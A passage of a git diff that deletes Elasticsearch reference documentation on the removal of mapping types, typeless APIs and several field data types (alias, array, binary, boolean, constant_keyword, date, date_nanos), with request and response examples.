benefits: - -* Data is more likely to be dense and so benefit from compression techniques - used in Lucene. - -* The term statistics used for scoring in full text search are more likely to - be accurate because all documents in the same index represent a single - entity. - -Each index can be sized appropriately for the number of documents it will -contain: you can use a smaller number of primary shards for `users` and a -larger number of primary shards for `tweets`. - -[discrete] -==== Custom type field - -Of course, there is a limit to how many primary shards can exist in a cluster -so you may not want to waste an entire shard for a collection of only a few -thousand documents. In this case, you can implement your own custom `type` -field which will work in a similar way to the old `_type`. - -Let's take the `user`/`tweet` example above. Originally, the workflow would -have looked something like this: - -[source,js] ----- -PUT twitter -{ - "mappings": { - "user": { - "properties": { - "name": { "type": "text" }, - "user_name": { "type": "keyword" }, - "email": { "type": "keyword" } - } - }, - "tweet": { - "properties": { - "content": { "type": "text" }, - "user_name": { "type": "keyword" }, - "tweeted_at": { "type": "date" } - } - } - } -} - -PUT twitter/user/kimchy -{ - "name": "Shay Banon", - "user_name": "kimchy", - "email": "shay@kimchy.com" -} - -PUT twitter/tweet/1 -{ - "user_name": "kimchy", - "tweeted_at": "2017-10-24T09:00:00Z", - "content": "Types are going away" -} - -GET twitter/tweet/_search -{ - "query": { - "match": { - "user_name": "kimchy" - } - } -} ----- -// NOTCONSOLE - -You can achieve the same thing by adding a custom `type` field as follows: - -[source,js] ----- -PUT twitter -{ - "mappings": { - "_doc": { - "properties": { - "type": { "type": "keyword" }, <1> - "name": { "type": "text" }, - "user_name": { "type": "keyword" }, - "email": { "type": "keyword" }, - "content": { "type": "text" }, - "tweeted_at": { "type": "date" } - } - } - } -} - -PUT twitter/_doc/user-kimchy -{ - "type": "user", <1> - "name": "Shay Banon", - "user_name": "kimchy", - "email": "shay@kimchy.com" -} - -PUT twitter/_doc/tweet-1 -{ - "type": "tweet", <1> - "user_name": "kimchy", - "tweeted_at": "2017-10-24T09:00:00Z", - "content": "Types are going away" -} - -GET twitter/_search -{ - "query": { - "bool": { - "must": { - "match": { - "user_name": "kimchy" - } - }, - "filter": { - "match": { - "type": "tweet" <1> - } - } - } - } -} ----- -// NOTCONSOLE -<1> The explicit `type` field takes the place of the implicit `_type` field. - -[discrete] -[[parent-child-mapping-types]] -==== Parent/Child without mapping types - -Previously, a parent-child relationship was represented by making one mapping -type the parent, and one or more other mapping types the children. Without -types, we can no longer use this syntax. The parent-child feature will -continue to function as before, except that the way of expressing the -relationship between documents has been changed to use the new -<>. - - -[discrete] -=== Schedule for removal of mapping types - -This is a big change for our users, so we have tried to make it as painless as -possible. The change will roll out as follows: - -Elasticsearch 5.6.0:: - -* Setting `index.mapping.single_type: true` on an index will enable the - single-type-per-index behaviour which will be enforced in 6.0. - -* The <> replacement for parent-child is available - on indices created in 5.6. - -Elasticsearch 6.x:: - -* Indices created in 5.x will continue to function in 6.x as they did in 5.x. - -* Indices created in 6.x only allow a single-type per index. Any name - can be used for the type, but there can be only one. The preferred type name - is `_doc`, so that index APIs have the same path as they will have in 7.0: - `PUT {index}/_doc/{id}` and `POST {index}/_doc` - -* The `_type` name can no longer be combined with the `_id` to form the `_uid` - field. The `_uid` field has become an alias for the `_id` field. - -* New indices no longer support the old-style of parent/child and should - use the <> instead. - -* The `_default_` mapping type is deprecated. - -* In 6.8, the index creation, index template, and mapping APIs support a query - string parameter (`include_type_name`) which indicates whether requests and - responses should include a type name. It defaults to `true`, and should be set - to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name` - will result in a deprecation warning. Indices which don't have an explicit type will - use the dummy type name `_doc`. - -Elasticsearch 7.x:: - -* Specifying types in requests is deprecated. For instance, indexing a - document no longer requires a document `type`. The new index APIs - are `PUT {index}/_doc/{id}` in case of explicit ids and `POST {index}/_doc` - for auto-generated ids. Note that in 7.0, `_doc` is a permanent part of the - path, and represents the endpoint name rather than the document type. - -* The `include_type_name` parameter in the index creation, index template, - and mapping APIs will default to `false`. Setting the parameter at all will - result in a deprecation warning. - -* The `_default_` mapping type is removed. - -Elasticsearch 8.x:: - -* Specifying types in requests is no longer supported. - -* The `include_type_name` parameter is removed. - -[discrete] -=== Migrating multi-type indices to single-type - -The <> can be used to convert multi-type indices to -single-type indices. The following examples can be used in Elasticsearch 5.6 -or Elasticsearch 6.x. In 6.x, there is no need to specify -`index.mapping.single_type` as that is the default. - -[discrete] -==== Index per document type - -This first example splits our `twitter` index into a `tweets` index and a -`users` index: - -[source,js] ----- -PUT users -{ - "settings": { - "index.mapping.single_type": true - }, - "mappings": { - "_doc": { - "properties": { - "name": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "email": { - "type": "keyword" - } - } - } - } -} - -PUT tweets -{ - "settings": { - "index.mapping.single_type": true - }, - "mappings": { - "_doc": { - "properties": { - "content": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "tweeted_at": { - "type": "date" - } - } - } - } -} - -POST _reindex -{ - "source": { - "index": "twitter", - "type": "user" - }, - "dest": { - "index": "users", - "type": "_doc" - } -} - -POST _reindex -{ - "source": { - "index": "twitter", - "type": "tweet" - }, - "dest": { - "index": "tweets", - "type": "_doc" - } -} ----- -// NOTCONSOLE - -[discrete] -==== Custom type field - -This next example adds a custom `type` field and sets it to the value of the -original `_type`. It also adds the type to the `_id` in case there are any -documents of different types which have conflicting IDs: - -[source,js] ----- -PUT new_twitter -{ - "mappings": { - "_doc": { - "properties": { - "type": { - "type": "keyword" - }, - "name": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "email": { - "type": "keyword" - }, - "content": { - "type": "text" - }, - "tweeted_at": { - "type": "date" - } - } - } - } -} - - -POST _reindex -{ - "source": { - "index": "twitter" - }, - "dest": { - "index": "new_twitter" - }, - "script": { - "source": """ - ctx._source.type = ctx._type; - ctx._id = ctx._type + '-' + ctx._id; - ctx._type = '_doc'; - """ - } -} ----- -// NOTCONSOLE - -[discrete] -=== Typeless APIs in 7.0 - -In Elasticsearch 7.0, each API will support typeless requests, -and specifying a type will produce a deprecation warning. - -NOTE: Typeless APIs work even if the target index contains a custom type. -For example, if an index has the custom type name `my_type`, we can add -documents to it using typeless `index` calls, and load documents with typeless -`get` calls. - -[discrete] -==== Index APIs - -Index creation, index template, and mapping APIs support a new `include_type_name` -URL parameter that specifies whether mapping definitions in requests and responses -should contain the type name. The parameter defaults to `true` in version 6.8 to -match the pre-7.0 behavior of using type names in mappings. It defaults to `false` -in version 7.0 and will be removed in version 8.0. - -It should be set explicitly in 6.8 to prepare to upgrade to 7.0. To avoid deprecation -warnings in 6.8, the parameter can be set to either `true` or `false`. In 7.0, setting -`include_type_name` at all will result in a deprecation warning. - -See some examples of interactions with Elasticsearch with this option set to `false`: - -[source,console] --------------------------------------------------- -PUT /my-index-000001?include_type_name=false -{ - "mappings": { - "properties": { <1> - "foo": { - "type": "keyword" - } - } - } -} --------------------------------------------------- - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_mappings?include_type_name=false -{ - "properties": { <1> - "bar": { - "type": "text" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mappings?include_type_name=false --------------------------------------------------- -// TEST[continued] - -The above call returns - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001": { - "mappings": { - "properties": { <1> - "foo": { - "type": "keyword" - }, - "bar": { - "type": "text" - } - } - } - } -} --------------------------------------------------- - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[discrete] -==== Document APIs - -In 7.0, index APIs must be called with the `{index}/_doc` path for automatic -generation of the `_id` and `{index}/_doc/{id}` with explicit ids. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1 -{ - "foo": "baz" -} --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_id": "1", - "_type": "_doc", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 0, - "_primary_term": 1 -} --------------------------------------------------- - -Similarly, the `get` and `delete` APIs use the path `{index}/_doc/{id}`: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_doc/1 --------------------------------------------------- -// TEST[continued] - -NOTE: In 7.0, `_doc` represents the endpoint name instead of the document type. -The `_doc` component is a permanent part of the path for the document `index`, -`get`, and `delete` APIs going forward, and will not be removed in 8.0. - -For API paths that contain both a type and endpoint name like `_update`, -in 7.0 the endpoint will immediately follow the index name: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_update/1 -{ - "doc" : { - "foo" : "qux" - } -} - -GET /my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -Types should also no longer appear in the body of requests. The following -example of bulk indexing omits the type both in the URL, and in the individual -bulk commands: - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "my-index-000001", "_id" : "3" } } -{ "foo" : "baz" } -{ "index" : { "_index" : "my-index-000001", "_id" : "4" } } -{ "foo" : "qux" } --------------------------------------------------- - -[discrete] -==== Search APIs - -When calling a search API such `_search`, `_msearch`, or `_explain`, types -should not be included in the URL. Additionally, the `_type` field should not -be used in queries, aggregations, or scripts. - -[discrete] -==== Types in responses - -The document and search APIs will continue to return a `_type` key in -responses, to avoid breaks to response parsing. However, the key is -considered deprecated and should no longer be referenced. Types will -be completely removed from responses in 8.0. - -Note that when a deprecated typed API is used, the index's mapping type will be -returned as normal, but that typeless APIs will return the dummy type `_doc` -in the response. For example, the following typeless `get` call will always -return `_doc` as the type, even if the mapping has a custom type name like -`my_type`: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/my_type/1 -{ - "foo": "baz" -} - -GET /my-index-000001/_doc/1 --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "_seq_no" : 0, - "_primary_term" : 1, - "found": true, - "_source" : { - "foo" : "baz" - } -} --------------------------------------------------- - -[discrete] -==== Index templates - -It is recommended to make index templates typeless by re-adding them with -`include_type_name` set to `false`. Under the hood, typeless templates will use -the dummy type `_doc` when creating indices. - -In case typeless templates are used with typed index creation calls or typed -templates are used with typeless index creation calls, the template will still -be applied but the index creation call decides whether there should be a type -or not. For instance in the below example, `index-1-01` will have a type in -spite of the fact that it matches a template that is typeless, and `index-2-01` -will be typeless in spite of the fact that it matches a template that defines -a type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from -the template that they match. - -[source,console] --------------------------------------------------- -PUT _template/template1 -{ - "index_patterns":[ "index-1-*" ], - "mappings": { - "properties": { - "foo": { - "type": "keyword" - } - } - } -} - -PUT _template/template2?include_type_name=true -{ - "index_patterns":[ "index-2-*" ], - "mappings": { - "type": { - "properties": { - "foo": { - "type": "keyword" - } - } - } - } -} - -PUT index-1-01?include_type_name=true -{ - "mappings": { - "type": { - "properties": { - "bar": { - "type": "long" - } - } - } - } -} - -PUT index-2-01 -{ - "mappings": { - "properties": { - "bar": { - "type": "long" - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_template/template1 -DELETE /_template/template2 --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -In case of implicit index creation, because of documents that get indexed in -an index that doesn't exist yet, the template is always honored. This is -usually not a problem due to the fact that typeless index calls work on typed -indices. - -[discrete] -==== Mixed-version clusters - -In a cluster composed of both 6.8 and 7.0 nodes, the parameter -`include_type_name` should be specified in index APIs like index -creation. This is because the parameter has a different default between -6.8 and 7.0, so the same mapping definition will not be valid for both -node versions. - -Typeless document APIs such as `bulk` and `update` are only available as of -7.0, and will not work with 6.8 nodes. This also holds true for the typeless -versions of queries that perform document lookups, such as `terms`. diff --git a/docs/reference/mapping/types.asciidoc b/docs/reference/mapping/types.asciidoc deleted file mode 100644 index 4cce14ea7f5..00000000000 --- a/docs/reference/mapping/types.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[mapping-types]] -== Field data types - -Each field has a _field data type_, or _field type_. This type indicates the -kind of data the field contains, such as strings or boolean values, and its -intended use. For example, you can index strings to both `text` and `keyword` -fields. However, `text` field values are <> for full-text -search while `keyword` strings are left as-is for filtering and sorting. - -Field types are grouped by _family_. Types in the same family support the same -search functionality but may have different space usage or performance -characteristics. - -Currently, the only type family is `keyword`, which consists of the `keyword`, -`constant_keyword`, and `wildcard` field types. Other type families have only a -single field type. For example, the `boolean` type family consists of one field -type: `boolean`. - - -[discrete] -[[_core_datatypes]] -==== Common types - -<>:: Binary value encoded as a Base64 string. -<>:: `true` and `false` values. -<>:: The keyword family, including `keyword`, `constant_keyword`, - and `wildcard`. -<>:: Numeric types, such as `long` and `double`, used to - express amounts. -Dates:: Date types, including <> and - <>. -<>:: Defines an alias for an existing field. - - -[discrete] -[[object-types]] -==== Objects and relational types - -<>:: A JSON object. -<>:: An entire JSON object as a single field value. -<>:: A JSON object that preserves the relationship - between its subfields. -<>:: Defines a parent/child relationship for documents - in the same index. - - -[discrete] -[[structured-data-types]] -==== Structured data types - -<>:: Range types, such as `long_range`, `double_range`, - `date_range`, and `ip_range`. -<>:: IPv4 and IPv6 addresses. -<>:: Software versions. Supports https://semver.org/[Semantic Versioning] -precedence rules. -{plugins}/mapper-murmur3.html[`murmur3`]:: Compute and stores hashes of -values. - - -[discrete] -[[aggregated-data-types]] -==== Aggregate data types - -<>:: Pre-aggregated numerical values. - - -[discrete] -[[text-search-types]] -==== Text search types - -<>:: Analyzed, unstructured text. -{plugins}/mapper-annotated-text.html[`annotated-text`]:: Text containing special -markup. Used for identifying named entities. -<>:: Used for auto-complete suggestions. -<>:: `text`-like type for -as-you-type completion. -<>:: A count of tokens in a text. - - -[discrete] -[[document-ranking-types]] -==== Document ranking types - -<>:: Records dense vectors of float values. -<>:: Records sparse vectors of float values. -<>:: Records a numeric feature to boost hits at - query time. -<>:: Records numeric features to boost hits at - query time. - - -[discrete] -[[spatial_datatypes]] -==== Spatial data types - -<>:: Latitude and longitude points. -<>:: Complex shapes, such as polygons. -<>:: Arbitrary cartesian points. -<>:: Arbitrary cartesian geometries. - - -[discrete] -[[other-types]] -==== Other types - -<>:: Indexes queries written in <>. - - -[discrete] -[[types-array-handling]] -=== Arrays -In {es}, arrays do not require a dedicated field data type. Any field can contain -zero or more values by default, however, all values in the array must be of the -same field type. See <>. - -[discrete] -=== Multi-fields - -It is often useful to index the same field in different ways for different -purposes. For instance, a `string` field could be mapped as -a `text` field for full-text search, and as a `keyword` field for -sorting or aggregations. Alternatively, you could index a text field with -the <>, the -<> analyzer, and the -<>. - -This is the purpose of _multi-fields_. Most field types support multi-fields -via the <> parameter. - -include::types/alias.asciidoc[] - -include::types/array.asciidoc[] - -include::types/binary.asciidoc[] - -include::types/boolean.asciidoc[] - -include::types/date.asciidoc[] - -include::types/date_nanos.asciidoc[] - -include::types/dense-vector.asciidoc[] - -include::types/flattened.asciidoc[] - -include::types/geo-point.asciidoc[] - -include::types/geo-shape.asciidoc[] - -include::types/histogram.asciidoc[] - -include::types/ip.asciidoc[] - -include::types/parent-join.asciidoc[] - -include::types/keyword.asciidoc[] - -include::types/nested.asciidoc[] - -include::types/numeric.asciidoc[] - -include::types/object.asciidoc[] - -include::types/percolator.asciidoc[] - -include::types/point.asciidoc[] - -include::types/range.asciidoc[] - -include::types/rank-feature.asciidoc[] - -include::types/rank-features.asciidoc[] - -include::types/search-as-you-type.asciidoc[] - -include::types/shape.asciidoc[] - -include::types/sparse-vector.asciidoc[] - -include::types/text.asciidoc[] - -include::types/token-count.asciidoc[] - -include::types/unsigned_long.asciidoc[] - -include::types/version.asciidoc[] diff --git a/docs/reference/mapping/types/alias.asciidoc b/docs/reference/mapping/types/alias.asciidoc deleted file mode 100644 index 78d9b749721..00000000000 --- a/docs/reference/mapping/types/alias.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[[alias]] -=== Alias field type -++++ -Alias -++++ - -An `alias` mapping defines an alternate name for a field in the index. -The alias can be used in place of the target field in <> requests, -and selected other APIs like <>. - -[source,console] --------------------------------- -PUT trips -{ - "mappings": { - "properties": { - "distance": { - "type": "long" - }, - "route_length_miles": { - "type": "alias", - "path": "distance" <1> - }, - "transit_mode": { - "type": "keyword" - } - } - } -} - -GET _search -{ - "query": { - "range" : { - "route_length_miles" : { - "gte" : 39 - } - } - } -} --------------------------------- - -<1> The path to the target field. Note that this must be the full path, including any parent -objects (e.g. `object1.object2.field`). - -Almost all components of the search request accept field aliases. In particular, aliases can be -used in queries, aggregations, and sort fields, as well as when requesting `docvalue_fields`, -`stored_fields`, suggestions, and highlights. Scripts also support aliases when accessing -field values. Please see the section on <> for exceptions. - -In some parts of the search request and when requesting field capabilities, field wildcard patterns can be -provided. In these cases, the wildcard pattern will match field aliases in addition to concrete fields: - -[source,console] --------------------------------- -GET trips/_field_caps?fields=route_*,transit_mode --------------------------------- -// TEST[continued] - -[[alias-targets]] -==== Alias targets - -There are a few restrictions on the target of an alias: - - * The target must be a concrete field, and not an object or another field alias. - * The target field must exist at the time the alias is created. - * If nested objects are defined, a field alias must have the same nested scope as its target. - -Additionally, a field alias can only have one target. This means that it is not possible to use a -field alias to query over multiple target fields in a single clause. - -An alias can be changed to refer to a new target through a mappings update. A known limitation is that -if any stored percolator queries contain the field alias, they will still refer to its original target. -More information can be found in the <>. - -[[unsupported-apis]] -==== Unsupported APIs - -Writes to field aliases are not supported: attempting to use an alias in an index or update request -will result in a failure. Likewise, aliases cannot be used as the target of `copy_to` or in multi-fields. - -Because alias names are not present in the document source, aliases cannot be used when performing -source filtering. For example, the following request will return an empty result for `_source`: - -[source,console] --------------------------------- -GET /_search -{ - "query" : { - "match_all": {} - }, - "_source": "route_length_miles" -} --------------------------------- -// TEST[continued] - -Currently only the search and field capabilities APIs will accept and resolve field aliases. -Other APIs that accept field names, such as <>, cannot be used -with field aliases. - -Finally, some queries, such as `terms`, `geo_shape`, and `more_like_this`, allow for fetching query -information from an indexed document. Because field aliases aren't supported when fetching documents, -the part of the query that specifies the lookup path cannot refer to a field by its alias. \ No newline at end of file diff --git a/docs/reference/mapping/types/array.asciidoc b/docs/reference/mapping/types/array.asciidoc deleted file mode 100644 index 38eabb14c19..00000000000 --- a/docs/reference/mapping/types/array.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[array]] -=== Arrays - -In Elasticsearch, there is no dedicated `array` data type. Any field can contain -zero or more values by default, however, all values in the array must be of the -same data type. For instance: - -* an array of strings: [ `"one"`, `"two"` ] -* an array of integers: [ `1`, `2` ] -* an array of arrays: [ `1`, [ `2`, `3` ]] which is the equivalent of [ `1`, `2`, `3` ] -* an array of objects: [ `{ "name": "Mary", "age": 12 }`, `{ "name": "John", "age": 10 }`] - -.Arrays of objects -[NOTE] -==================================================== - -Arrays of objects do not work as you would expect: you cannot query each -object independently of the other objects in the array. If you need to be -able to do this then you should use the <> data type instead -of the <> data type. - -This is explained in more detail in <>. -==================================================== - - -When adding a field dynamically, the first value in the array determines the -field `type`. All subsequent values must be of the same data type or it must -at least be possible to <> subsequent values to the same -data type. - -Arrays with a mixture of data types are _not_ supported: [ `10`, `"some string"` ] - -An array may contain `null` values, which are either replaced by the -configured <> or skipped entirely. An empty array -`[]` is treated as a missing field -- a field with no values. - -Nothing needs to be pre-configured in order to use arrays in documents, they -are supported out of the box: - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "message": "some arrays in this document...", - "tags": [ "elasticsearch", "wow" ], <1> - "lists": [ <2> - { - "name": "prog_list", - "description": "programming list" - }, - { - "name": "cool_list", - "description": "cool stuff list" - } - ] -} - -PUT my-index-000001/_doc/2 <3> -{ - "message": "no arrays in this document...", - "tags": "elasticsearch", - "lists": { - "name": "prog_list", - "description": "programming list" - } -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "tags": "elasticsearch" <4> - } - } -} --------------------------------------------------- - -<1> The `tags` field is dynamically added as a `string` field. -<2> The `lists` field is dynamically added as an `object` field. -<3> The second document contains no arrays, but can be indexed into the same fields. -<4> The query looks for `elasticsearch` in the `tags` field, and matches both documents. - -[[multi-value-fields-inverted-index]] -.Multi-value fields and the inverted index -**************************************************** - -The fact that all field types support multi-value fields out of the box is a -consequence of the origins of Lucene. Lucene was designed to be a full text -search engine. In order to be able to search for individual words within a -big block of text, Lucene tokenizes the text into individual terms, and -adds each term to the inverted index separately. - -This means that even a simple text field must be able to support multiple -values by default. When other data types were added, such as numbers and -dates, they used the same data structure as strings, and so got multi-values -for free. - -**************************************************** - diff --git a/docs/reference/mapping/types/binary.asciidoc b/docs/reference/mapping/types/binary.asciidoc deleted file mode 100644 index 032e7e6e1b5..00000000000 --- a/docs/reference/mapping/types/binary.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[[binary]] -=== Binary field type -++++ -Binary -++++ - -The `binary` type accepts a binary value as a -{wikipedia}/Base64[Base64] encoded string. The field is not -stored by default and is not searchable: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { - "type": "text" - }, - "blob": { - "type": "binary" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "name": "Some binary blob", - "blob": "U29tZSBiaW5hcnkgYmxvYg==" <1> -} --------------------------------------------------- - -<1> The Base64 encoded binary value must not have embedded newlines `\n`. - -[[binary-params]] -==== Parameters for `binary` fields - -The following parameters are accepted by `binary` fields: - -[horizontal] - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - or `false` (default). - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/boolean.asciidoc b/docs/reference/mapping/types/boolean.asciidoc deleted file mode 100644 index 01650ef118b..00000000000 --- a/docs/reference/mapping/types/boolean.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[boolean]] -=== Boolean field type -++++ -Boolean -++++ - -Boolean fields accept JSON `true` and `false` values, but can also accept -strings which are interpreted as either true or false: - -[horizontal] -False values:: - - `false`, `"false"`, `""` (empty string) - -True values:: - - `true`, `"true"` - -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "is_published": { - "type": "boolean" - } - } - } -} - -POST my-index-000001/_doc/1 -{ - "is_published": "true" <1> -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "is_published": true <2> - } - } -} --------------------------------------------------- - -<1> Indexing a document with `"true"`, which is interpreted as `true`. -<2> Searching for documents with a JSON `true`. - -Aggregations like the <> use `1` and `0` for the `key`, and the strings `"true"` and -`"false"` for the `key_as_string`. Boolean fields when used in scripts, -return `1` and `0`: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/1 -{ - "is_published": true -} - -POST my-index-000001/_doc/2 -{ - "is_published": false -} - -GET my-index-000001/_search -{ - "aggs": { - "publish_state": { - "terms": { - "field": "is_published" - } - } - }, - "script_fields": { - "is_published": { - "script": { - "lang": "painless", - "source": "doc['is_published'].value" - } - } - } -} --------------------------------------------------- - -[[boolean-params]] -==== Parameters for `boolean` fields - -The following parameters are accepted by `boolean` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts any of the true or false values listed above. The value is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. diff --git a/docs/reference/mapping/types/constant-keyword.asciidoc b/docs/reference/mapping/types/constant-keyword.asciidoc deleted file mode 100644 index 20d394308ba..00000000000 --- a/docs/reference/mapping/types/constant-keyword.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[discrete] -[[constant-keyword-field-type]] -=== Constant keyword field type - -Constant keyword is a specialization of the `keyword` field for -the case that all documents in the index have the same value. - -[source,console] --------------------------------- -PUT logs-debug -{ - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - }, - "message": { - "type": "text" - }, - "level": { - "type": "constant_keyword", - "value": "debug" - } - } - } -} --------------------------------- - -`constant_keyword` supports the same queries and aggregations as `keyword` -fields do, but takes advantage of the fact that all documents have the same -value per index to execute queries more efficiently. - -It is both allowed to submit documents that don't have a value for the field or -that have a value equal to the value configured in mappings. The two below -indexing requests are equivalent: - -[source,console] --------------------------------- -POST logs-debug/_doc -{ - "date": "2019-12-12", - "message": "Starting up Elasticsearch", - "level": "debug" -} - -POST logs-debug/_doc -{ - "date": "2019-12-12", - "message": "Starting up Elasticsearch" -} --------------------------------- -//TEST[continued] - -However providing a value that is different from the one configured in the -mapping is disallowed. - -In case no `value` is provided in the mappings, the field will automatically -configure itself based on the value contained in the first indexed document. -While this behavior can be convenient, note that it means that a single -poisonous document can cause all other documents to be rejected if it had a -wrong value. - -Before a value has been provided (either through the mappings or from a -document), queries on the field will not match any documents. This includes - <> queries. - -The `value` of the field cannot be changed after it has been set. - -[discrete] -[[constant-keyword-params]] -==== Parameters for constant keyword fields - -The following mapping parameters are accepted: - -[horizontal] - -<>:: - - Metadata about the field. - -`value`:: - - The value to associate with all documents in the index. If this parameter - is not provided, it is set based on the first document that gets indexed. - diff --git a/docs/reference/mapping/types/date.asciidoc b/docs/reference/mapping/types/date.asciidoc deleted file mode 100644 index 65336772562..00000000000 --- a/docs/reference/mapping/types/date.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[date]] -=== Date field type -++++ -Date -++++ - -JSON doesn't have a date data type, so dates in Elasticsearch can either be: - -* strings containing formatted dates, e.g. `"2015-01-01"` or `"2015/01/01 12:10:30"`. -* a long number representing _milliseconds-since-the-epoch_. -* an integer representing _seconds-since-the-epoch_. - -NOTE: Values for _milliseconds-since-the-epoch_ and _seconds-since-the-epoch_ -must be non-negative. Use a formatted date to represent dates before 1970. - -Internally, dates are converted to UTC (if the time-zone is specified) and -stored as a long number representing milliseconds-since-the-epoch. - -Queries on dates are internally converted to range queries on this long -representation, and the result of aggregations and stored fields is converted -back to a string depending on the date format that is associated with the field. - -NOTE: Dates will always be rendered as strings, even if they were initially -supplied as a long in the JSON document. - -Date formats can be customised, but if no `format` is specified then it uses -the default: - - "strict_date_optional_time||epoch_millis" - -This means that it will accept dates with optional timestamps, which conform -to the formats supported by <> -or milliseconds-since-the-epoch. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "date": "2015-01-01" } <2> - -PUT my-index-000001/_doc/2 -{ "date": "2015-01-01T12:10:30Z" } <3> - -PUT my-index-000001/_doc/3 -{ "date": 1420070400001 } <4> - -GET my-index-000001/_search -{ - "sort": { "date": "asc"} <5> -} --------------------------------------------------- - -<1> The `date` field uses the default `format`. -<2> This document uses a plain date. -<3> This document includes a time. -<4> This document uses milliseconds-since-the-epoch. -<5> Note that the `sort` values that are returned are all in milliseconds-since-the-epoch. - -[[multiple-date-formats]] -==== Multiple date formats - -Multiple formats can be specified by separating them with `||` as a separator. -Each format will be tried in turn until a matching format is found. The first -format will be used to convert the _milliseconds-since-the-epoch_ value back -into a string. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date", - "format": "yyyy-MM-dd HH:mm:ss||yyyy-MM-dd||epoch_millis" - } - } - } -} --------------------------------------------------- - -[[date-params]] -==== Parameters for `date` fields - -The following parameters are accepted by `date` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - The date format(s) that can be parsed. Defaults to - `strict_date_optional_time||epoch_millis`. - -`locale`:: - - The locale to use when parsing dates since months do not have the same names - and/or abbreviations in all languages. The default is the - https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#ROOT[`ROOT` locale], - -<>:: - - If `true`, malformed numbers are ignored. If `false` (default), malformed - numbers throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a date value in one of the configured +format+'s as the field - which is substituted for any explicit `null` values. Defaults to `null`, - which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. diff --git a/docs/reference/mapping/types/date_nanos.asciidoc b/docs/reference/mapping/types/date_nanos.asciidoc deleted file mode 100644 index 26961cac1e2..00000000000 --- a/docs/reference/mapping/types/date_nanos.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[date_nanos]] -=== Date nanoseconds field type -++++ -Date nanoseconds -++++ - -This data type is an addition to the `date` data type. However there is an -important distinction between the two. The existing `date` data type stores -dates in millisecond resolution. The `date_nanos` data type stores dates -in nanosecond resolution, which limits its range of dates from roughly -1970 to 2262, as dates are still stored as a long representing nanoseconds -since the epoch. - -Queries on nanoseconds are internally converted to range queries on this long -representation, and the result of aggregations and stored fields is converted -back to a string depending on the date format that is associated with the field. - -Date formats can be customised, but if no `format` is specified then it uses -the default: - - "strict_date_optional_time||epoch_millis" - -This means that it will accept dates with optional timestamps, which conform -to the formats supported by -<> including up to nine second -fractionals or milliseconds-since-the-epoch (thus losing precision on the -nano second part). Using <> will -format the result up to only three second fractionals. To -print and parse up to nine digits of resolution, use <>. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001?include_type_name=true -{ - "mappings": { - 